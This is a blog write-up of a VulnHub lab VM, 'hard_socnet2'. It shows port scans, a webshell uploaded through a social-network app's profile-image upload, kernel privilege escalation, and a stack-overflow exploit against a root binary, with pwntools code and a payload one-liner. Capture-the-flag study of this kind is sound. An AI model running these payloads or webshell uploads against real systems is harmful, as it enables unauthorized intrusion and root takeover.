vulnhub5

This post was last updated 530 days ago; the information in it may be out of date.

Target VM download link:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

Information gathering

Step one is information gathering. As usual, I like to use fscan and nmap together.

A quick overall probe with fscan:

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.120.141
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.120.141 is alive
[*] Icmp alive hosts len is: 1
192.168.120.141:22 open
192.168.120.141:80 open
192.168.120.141:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.120.141:8000 code:501 len:216 title:Error response
[*] WebTitle: http://192.168.120.141 code:200 len:10609 title:Social Network

Full port scan with nmap:

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:15 CST
Nmap scan report for 192.168.120.141
Host is up (0.000033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 00:0C:29:F4:0E:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

nmap service and OS detection on the open ports:

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sT -sV -O -p 22,80,8000 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:16 CST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:16 (0:00:12 remaining)
Nmap scan report for 192.168.120.141
Host is up (0.00013s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http     BaseHTTPServer 0.3 (Python 2.7.15rc1)
MAC Address: 00:0C:29:F4:0E:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds

getshell

Two web services are exposed: one served by Apache 2 and one by Python.

The normal approach is to visit the web services first, starting with the one on port 80.

image

It is a user login/registration page. Since we do not have the admin's email address, all we can do is register an account and check whether the logged-in part of the application has any vulnerabilities.

First we register an account:

image

After logging in, a quick test for vulnerabilities:

image

There is an XSS (but it is not much use).

image

Testing for other vulnerabilities:

image

There is a file upload function, which is worth a quick test:

image

Upload a webshell; it seems to succeed. Try connecting to it:

image

The uploaded file is at: http://192.168.120.141/data/images/profiles/3.php

image

The connection succeeds.

Privilege escalation 1

Escalating privileges:

image

That CVE still works...

Privilege escalation 2

But this does not seem to be the intended solution; the intended one requires pwn.

Time to learn pwn on the spot.

After getting a shell, in the /home/user directory we can see

image

a service that is started with root privileges.

We download it to Kali and debug it with pwndbg (if it is not installed: pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com)).

First use checksec to see which protections are enabled:

┌──(kali㉿kali)-[~/Desktop]
└─$ checksec add_record
[*] '/home/kali/Desktop/add_record'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

Apart from one Stack entry, every protection is off.

Start pwndbg:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gdb -q add_record
pwndbg: loaded 147 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $ida GDB functions (can be used with print/break)
Reading symbols from add_record...
(No debugging symbols found in add_record)
------- tip of the day (disable with set show-tips off) -------
Pwndbg context displays where the program branches to thanks to emulating few instructions into the future. You can disable this with set emulate off which may also speed up debugging
pwndbg>

First we test where a stack overflow exists (because stack overflows are all I know).

Prepare a long run of A's to test for the overflow:

┌──(kali㉿kali)-[~/Desktop]
└─$ python -c "print('A'*1000)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Run the program with r:

image

After the input, the program exits abnormally right away, so we conclude there is no stack overflow here and move on to the next input:

image

It exits normally as well; keep going down the inputs until the last one, Explain:

pwndbg> r
Starting program: /home/kali/Desktop/add_record
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): a
Years worked(int): 1
Salary(int): 1
Ever got in trouble? 1 (yes) or 0 (no): 1
Explain: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────
*EAX 0xffffd27e ◂— 0x41414141 ('AAAA')
*EBX 0x41414141 ('AAAA')
*ECX 0xffffd6c0 ◂— 'AAAA'
*EDX 0xffffd662 ◂— 'AAAA'
*EDI 0xffffd340 ◂— 0x41414141 ('AAAA')
*ESI 0x80488d0 (__libc_csu_init) ◂— push ebp
*EBP 0x41414141 ('AAAA')
*ESP 0xffffd2c0 ◂— 0x41414141 ('AAAA')
*EIP 0x41414141 ('AAAA')
──────────────────[ DISASM / i386 / set emulate on ]───────────────────
Invalid address 0x41414141
───────────────────────────────[ STACK ]───────────────────────────────
00:0000│ esp 0xffffd2c0 ◂— 0x41414141 ('AAAA')
... ↓ 7 skipped
─────────────────────────────[ BACKTRACE ]─────────────────────────────
► 0 0x41414141
  1 0x41414141
  2 0x41414141
  3 0x41414141
  4 0x41414141
  5 0x41414141
  6 0x41414141
  7 0x41414141
───────────────────────────────────────────────────────────────────────

Here we see that the return address on the stack can be overwritten, which means a vulnerability may exist at this input.

How do we exploit it?

Opening the program in IDA, we find

image

that the program contains a backdoor function which simply calls system('/bin/sh').

So we only need to overwrite EIP with the address of the backdoor function; executing it gives us a /bin/sh.

The next step is to find which position overwrites EIP, because among the 1000 A's we sent we do not know exactly which ones landed in EIP;

we only know that it can be overwritten:

image

So we use the unique pattern string generated by MSF to locate the position:

msf-pattern_create -l 1000

image

As the screenshot shows, 0Ac1 overwrote EIP, so we look up how many characters precede 0Ac1 in the pattern:

msf-pattern_offset -q 0Ac1

image

It is 62, so we pad with 62 bytes in front.

Now write the exploit:
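As an added example (not code from the original post), here is a small Python reimplementation of what msf-pattern_create and msf-pattern_offset do, so the 62-byte offset found above can be reproduced without Metasploit; it also accepts the query as the raw EIP value rather than only the four characters:

```python
"""Locate a stack-overflow offset with a Metasploit-style cyclic pattern.

Added example, not code from the original post: a reimplementation of the
msf-pattern_create / msf-pattern_offset behaviour used above to find the
62-byte distance from the start of the 'Explain' input to the saved EIP.
"""
import struct
from string import ascii_lowercase, ascii_uppercase, digits

# Full pattern: Aa0 Aa1 ... Aa9 Ab0 ... Zz9; every 4-byte window is unique.
_FULL_PATTERN = "".join(
    u + l + d for u in ascii_uppercase for l in ascii_lowercase for d in digits
)


def pattern_create(length):
    """Return the first `length` characters of the pattern (msf-pattern_create -l)."""
    if length > len(_FULL_PATTERN):
        # msf would start repeating the pattern here, which makes lookups ambiguous.
        raise ValueError("pattern longer than %d is not unique" % len(_FULL_PATTERN))
    return _FULL_PATTERN[:length]


def pattern_offset(query, length=1000):
    """Offset of `query` in the pattern, or None if absent (msf-pattern_offset -q).

    `query` is either the 4 characters seen in the crash ("0Ac1") or the raw
    register value (0x31634130). A register value is decoded as a little-endian
    dword, because that is the byte order in which the input landed in EIP on
    i386; msf-pattern_offset performs the same conversion for hex queries.
    """
    if isinstance(query, int):
        query = struct.pack("<I", query).decode("ascii")
    idx = pattern_create(length).find(query)
    return None if idx < 0 else idx


if __name__ == "__main__":
    print(pattern_offset("0Ac1"))        # 62: the padding length used above
    print(pattern_offset(0x31634130))    # 62: same query given as EIP's value
```

Querying the mistyped 0Ab1 instead returns 32, which is why the query must be the exact four characters (or register value) seen at the crash.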

image

Here we see that the address of backdoor is 0x08048676.

The padding is 62 bytes.

The exploit:

from pwn import *

p = process("./add_record")
backdoor = 0x8048676  # address of the backdoor function, taken from IDA

# the first four prompts: name, years worked, salary, trouble flag
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')

# Explain prompt: 62 bytes of padding, then the return address (little-endian)
payload = b'a'*62 + p32(backdoor)
p.sendline(payload)
p.interactive()

But this only works when run on the target system itself; it cannot be used against the remote environment, so use this instead:

python -c "import struct;print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" > payload

Then run it (the one-liner is Python 2 syntax, matching the Python 2.7 interpreter on the target; under Python 3 the str/bytes concatenation would raise a TypeError):

cat payload - | ./add_record

and we get a shell, as root. The trailing dash makes cat read its own standard input after the payload file, so the contents of payload are fed to ./add_record's standard input through the pipe, and the pipe then stays open for the commands we type into the shell.

image

Reference link for learning pwn

pwn learning: locating the overflow position (CSDN blog)
